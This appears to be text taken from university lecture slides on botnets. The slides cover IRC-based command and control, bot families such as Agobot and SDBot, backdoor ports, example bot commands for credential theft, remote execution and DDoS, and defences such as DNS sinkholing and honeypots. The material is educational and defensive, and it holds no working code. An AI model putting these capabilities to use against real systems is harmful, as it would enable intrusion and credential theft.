2. 2
Acknowledgement
This lecture uses some contents from the lecture notes
from:
Dr. Dawn Song: CS161: computer security
Richard Wang – SophosLabs: The Development of Botnets
Randy Marchany - VA Tech IT Security Lab: Botnets
3. 3
Botnets
Collection of compromised hosts
Spread like worms and viruses
Once installed, respond to remote commands
A network of ‘bots’
robot :
an automatic machine that can be
programmed to perform specific tasks.
Also known as ‘zombies’
4. 4
Platform for many attacks
Spam forwarding (70% of all spam?)
Click fraud
Keystroke logging
Distributed denial of service attacks
Serious problem
Top concern of banks, online merchants
Vint Cerf: ¼ of hosts connected to Internet
8. 8
Why IRC?
IRC servers are:
freely available
easy to manage
easy to subvert
Attackers have experience with IRC
IRC bots usually have a way to remotely
upgrade victims with new payloads to
stay ahead of security efforts
9. 9
How bad is the problem?
Symantec identified a 400K node botnet
Netadmin in the Netherlands discovered
1-2M unique IPs associated with Phatbot
infections.
Phatbot harvests MyDoom and Bagel infected
machines.
Researchers in Gtech monitored
thousands of botnets
10. 10
Spreading Problem
Spreading mechanism is a leading cause
of background noise
Port 445, 135, 139, 137 accounted for 80%
of traffic captured by German Honeynet
Project
Other ports
2745 – bagle backdoor
3127 – MyDoom backdoor
3410 – Optix trojan backdoor
5000 – upnp vulnerability
12. Agobot
Most sophisticated
20,000 lines C/C++ code
IRC based command/control
Large collection of target exploits
Capable of many DoS attack types
Shell encoding/polymorphic obfuscation
Traffic sniffers/key logging
Defend/fortify compromised system
Ability to frustrate dissassembly
13. SDBot
Simpler than Agobot, 2,000 lines C code
Non-malicious at base
Utilize IRC-based command/control
Easily extended for malicious purposes
Scanning
DoS Attacks
Sniffers
Information harvesting
Encryption
14. SpyBot
<3,000 lines C code
Possibly evolved from SDBot
Similar command/control engine
No attempts to hide malicious purposes
15. GT Bot
Functions based on mIRC scripting
capabilities
HideWindow program hides bot on local
system
Basic rootkit function
Port scanning, DoS attacks, exploits for
RPC and NetBIOS
16. Variance in codebase size, structure, complexity,
implementation
Convergence in set of functions
Possibility for defense systems effective across bot
families
Bot families extensible
Agobot likely to become dominant
17. All of the above use IRC for command/control
Disrupt IRC, disable bots
Sniff IRC traffic for commands
Shutdown channels used for Botnets
IRC operators play central role in stopping botnet
traffic
But a botnet could use its own IRC server
Automated traffic identification required
Future botnets may move away from IRC
Move to P2P communication
Traffic fingerprinting still useful for identification
Control
18. Host control
Fortify system against other malicious attacks
Disable anti-virus software
Harvest sensitive information
PayPal, software keys, etc.
Economic incentives for botnets
Stresses need to patch/protect systems prior to
attack
Stronger protection boundaries required across
applications in OSes
21. 21
Example Botnet Commands
pstore
Display all usernames/passwords stored in
browsers of infected systems
bot.execute
Run executable on remote system
bot.open
Reads file on remote computer
bot.command
Runs command with system()
22. 22
Example Botnet Commands
http.execute
Download and execute file through http
ftp.execute
ddos.udpflood
ddos.synflod
ddos.phaticmp
redirect.http
redirect.socks
23. 23
Current Botnet Control Architecture
bot bot
C&C
botmaster
bot
C&C
•More than one C&C server
•Spread all around the world
24. 24
Botnet Monitor: Gatech KarstNet
A lot bots use Dyn-
DNS name to find C&C
bot
bot
C&C
attacker
C&C
KarstNet sinkhole
cc1.com
KarstNet informs DNS
provider of cc1.com
Detect cc1.com by its abnormal DNS
queries
DNS provider maps
cc1.com to Gatech sinkhole
(DNS hijack)
bot
All/most bots attempt to
connect the sinkhole
25. Botnet Monitor: Honeypot Spy
Security researchers set up honeypots
Honeypots: deliberately set up vulnerable machines
When compromised, put close monitoring of malware’s behaviors
Tutorial:
http://en.wikipedia.org/wiki/Honeypot_%28computing%29
When compromised honeypot joins a botnet
Passive monitoring: log all network traffic
Active monitoring: actively contact other bots to obtain more
information (neighborhood list, additional c&c, etc.)
Representative research paper:
A multifaceted approach to understanding the botnet phenomenon,
Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis,
Andreas, 6th ACM SIGCOMM conference on Internet measurement
(IMC), 2006.
25
26. 26
The Future Generation of Botnets
Peer-to-Peer C&C
Polymorphism
Anti-honeypot
Rootkit techniques